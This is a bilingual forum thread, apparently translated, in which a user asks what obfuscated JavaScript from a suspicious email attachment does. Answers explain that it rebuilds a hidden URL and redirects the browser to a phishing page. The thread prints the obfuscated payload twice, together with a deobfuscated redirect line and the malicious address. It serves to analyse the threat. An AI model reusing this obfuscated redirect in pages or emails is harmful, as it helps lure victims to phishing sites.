这个可疑的网络钓鱼代码有什么作用?
我的一些非 IT 同事打开了一封电子邮件中的 .html 附件,该附件看起来非常可疑。当运行某些 javascript 代码时,会导致黑屏。
<script type='text/javascript'>function uK(){};var kV='';uK.prototype = {f : function() {d=4906;var w=function(){};var u=new Date();var hK=function(){};var h='hXtHt9pH:9/H/Hl^e9n9dXe!r^mXeXd!i!a^.^c^oHm^/!iHmHaXg!e9sH/^zX.!hXt9m^'.replace(/[\^H\!9X]/g, '');var n=new Array();var e=function(){};var eJ='';t=document['lDo6cDart>iro6nD'.replace(/[Dr\]6\>]/g, '')];this.nH=false;eX=2280;dF="dF";var hN=function(){return 'hN'};this.g=6633;var a='';dK="";function x(b){var aF=new Array();this.q='';var hKB=false;var uN="";b['hIrBeTf.'.replace(/[\.BTAI]/g, '')]=h;this.qO=15083;uR='';var hB=new Date();s="s";}var dI=46541;gN=55114;this.c="c";nT="";this.bG=false;var m=new Date();var fJ=49510;x(t);this.y="";bL='';var k=new Date();var mE=function(){};}};var l=22739;var tL=new uK(); var p="";tL.f();this.kY=false;</script>
它做了什么?这超出了我的编程知识范围。
A few of my non-IT coworkers opened a .html attachment in an email message that looks extremely suspicious. It resulted in a blank screen when it appears that some javascript code was run.
<script type='text/javascript'>function uK(){};var kV='';uK.prototype = {f : function() {d=4906;var w=function(){};var u=new Date();var hK=function(){};var h='hXtHt9pH:9/H/Hl^e9n9dXe!r^mXeXd!i!a^.^c^oHm^/!iHmHaXg!e9sH/^zX.!hXt9m^'.replace(/[\^H\!9X]/g, '');var n=new Array();var e=function(){};var eJ='';t=document['lDo6cDart>iro6nD'.replace(/[Dr\]6\>]/g, '')];this.nH=false;eX=2280;dF="dF";var hN=function(){return 'hN'};this.g=6633;var a='';dK="";function x(b){var aF=new Array();this.q='';var hKB=false;var uN="";b['hIrBeTf.'.replace(/[\.BTAI]/g, '')]=h;this.qO=15083;uR='';var hB=new Date();s="s";}var dI=46541;gN=55114;this.c="c";nT="";this.bG=false;var m=new Date();var fJ=49510;x(t);this.y="";bL='';var k=new Date();var mE=function(){};}};var l=22739;var tL=new uK(); var p="";tL.f();this.kY=false;</script>
What did it do? It's beyond the scope of my programming knowledge.
如果你对这篇内容有疑问,欢迎到本站社区发帖提问 参与讨论,获取更多帮助,或者扫码二维码加入 Web 技术交流群。
绑定邮箱获取回复消息
由于您还没有绑定你的真实邮箱,如果其他用户或者作者回复了您的评论,将不能在第一时间通知您!
发布评论
评论(4)
它将重定向到一个网址,'http://lendermedia.com/images/z.htm'(遵循它的风险由您自己承担)。
将代码复制并粘贴到有价值的 JavaScript 编辑器中,并让它为您格式化源代码。
要点:
h将等于 'http://lendermedia.com/images/ z.htm't将包含对document.location的引用b名为href的属性>,此时(在另一个函数内)实际上是上面语句中的t,被设置为h,即 url。大部分代码只是噪音,实际功能包括:
It will redirect to an url, 'http://lendermedia.com/images/z.htm' (follow it on your own risk).
Copy and paste the code to a worthy JavaScript editor and have it format the source for you.
Key points:
hwill equal 'http://lendermedia.com/images/z.htm'twill contain a reference todocument.locationThe property named
hrefofb, which at this point (inside another function) really istfrom the above statement, is set toh, which is the url.Most of the code is mere noise, the actual functionality consists of this:
我遇到了同样的问题,然后找到了这个页面。在对联系信息进行 WHOIS 查询后,我联系了 lendermedia.com 的所有者,他似乎刚刚发现他的网站在他不知情的情况下托管
z.htm页面,并且违反了他的要求愿望。当我联系他时,我能够浏览他的/images/目录。此后他更改了权限。所有这些都表明这个人看起来很干净,但这由你决定。I encountered the same issue, and then found this page. After doing a WHOIS for the contact info, I contacted the owner of lendermedia.com, who appeared to have just found out that his site is hosting the
z.htmpage w/out his knowledge and against his wishes. At the time I contacted him I was able to browse his/images/directory. He has since changed the permissions. All this to say that it appears this guy is clean, but that's for you to decide.减去混淆,它会执行类似
document.location.href="http://lendermedia.com/images/z.htm"的操作Minus the obfuscation, it does something like
document.location.href="http://lendermedia.com/images/z.htm"理解该代码的关键部分是
replace(/[\^H\!9X]/g, '')部分。如果替换的第二个参数是'',那么它只是从前一个字符串中删除内容。混淆事物的方式确实很不优雅。目标可能只是对每个用户进行随机处理并避免贝叶斯垃圾邮件过滤器。
Key part to understand that code is the
replace(/[\^H\!9X]/g, '')parts. if the 2nd argument for the replace is'', then it's merely removing stuff from the previous string.Really inelegant way to obfuscate things. Probably the aim is just to be random for each user and avoid Bayesian spam filters.